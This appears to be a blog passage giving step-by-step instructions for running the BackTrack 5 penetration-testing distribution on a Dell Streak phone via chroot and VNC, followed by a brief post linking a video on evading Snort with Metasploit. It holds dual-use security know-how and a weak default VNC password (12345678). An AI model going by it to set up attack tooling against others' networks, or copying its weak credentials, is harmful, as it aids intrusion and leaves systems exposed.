Since the original ARM version of Back|Track 5 cannot be copied to the SD Card due to the size of the image larger than 4GB. You should download a resized version which is developed by anantshri.

bt.7z.001
bt.7z.002
bt.7z.003

MD5SUM :
558ecb1f0e5feb1da86526df8761e6cc bt.7z.001
247842fd0d3ebb39454f76f4704d1537 bt.7z.002
f74d2f744434a7182b13287d9f8165e7 bt.7z.003

Step 7 :

Double click on "bt.7z.001" to extract. You will then see the following after the extract.

bt
bt.img
startbt
stopbt
installbt.sh

You should create a directory of "bt" (or folder) on the SD Card's root directory.

Copy these files to "/sdcard/bt".

Step 8 :

Run the following commands on the Terminal Emulator on your Streak.

su
cd /sdcard/bt
sh installbt.sh

** This step is just doing ONCE unless your ROM is reflashed or updated.

Step 9 :

Run the following commands on the Terminal Emulator on your Streak.

To start the Back|Track 5 :

su
startbt
bt

Then, you will drop to the Back|Track shell

Step 10 :

Under the Back|Track shell, run the following :

ui

** It will start the VNC server on your Streak.

Step 11 :

Press "Home" on your Streak and then run the apps "Mocha VNC Lite".

Name : BackTrack (or bt for short)
Address : localhost
Port : 5901
Password : 12345678


Then, press "Connect". You will see the Back|Track 5 launched.

** The setting of the Mocha VNC Lite will be remembered. That means you just type ONCE.

Press "Home" to go to the Streak screen. Back|Track 5 is still running.

Step 12 :

To stop the Back|Track 5, run the following command on the Back|Track shell :

killui

** Stop the VNC server.

And then, run the following command :

Exit the Terminal Emulator and then restart it.

su
stopbt

Now, the Back|Track 5 is stopped running.

Step 13 :

To launch the Back|Track next time, you should repeat the Step 9 to 11. And stop the Back|Track just repeat Step 12.

Source :

BACKTRACK 5 on Xperia X10 chroot

Streak - MultiRecoveryFlasher

The method of resize the Back|Track 5 image to 3.3GB

Remarks :

(1) Make sure you run "killui" and "stopbt" when BackTrack 5 is not required.

(2) The aircrack-ng cannot be ran properly as the interface is eth0 instead of wlan0. No monitor mode and no injection.

(3) Download MultiRecoveryFlasher at the Source above. Then, flash "StreakMod-Recovery" if you cannot flash the SimpleStreak. Under Ubuntu, you are not required to install any driver but you need to run the program in root. Go to root by the following command :

sudo -sH

That's all! See you.

Does Snort really protect your network?

Before watching the video below which is prepared by TOX1C, I always think that Snort is powerful and protective. Now, I know that Snort cannot protect your network from being hacked by skilled hackers.

Enjoy!

Pissing on Snort with Metasploit from T0X1C on Vimeo.